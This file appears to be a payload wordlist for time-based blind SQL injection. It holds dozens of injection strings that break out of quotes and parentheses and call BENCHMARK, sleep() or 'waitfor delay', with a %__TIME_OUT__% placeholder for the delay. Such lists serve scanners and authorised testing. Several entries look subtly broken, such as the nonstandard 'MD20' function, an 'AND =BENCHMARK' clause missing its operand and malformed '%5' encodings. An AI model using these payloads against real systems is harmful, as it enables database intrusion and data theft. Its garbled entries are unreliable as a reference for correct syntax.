' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341))--
' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341))-- 1337
" AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341))-- 1337
') AND =BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341))--
') AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341))-- 1337
') AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ('1337'='1337
')) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ((('1337'='1337
' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND '1337'='1337
') AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND '1337%'='1337
' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ("1337"="1337
")) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ((("1337"="1337
" AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND "1337"="1337
") AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x774c20341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x2076e7a207)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK((%__TIME_OUT__%),MD20(0x2076e7a207)) AND '1337'='1337
BENCHMARK(%__TIME_OUT__%,MD20(CHAR(116)))
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0) and 1=1)"/
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
';%5waitfor%5delay%5'%__TIME_OUT__%'%5--%5
waitfor delay '%__TIME_OUT__%'
waitfor delay '%__TIME_OUT__%'#
waitfor delay '%__TIME_OUT__%'--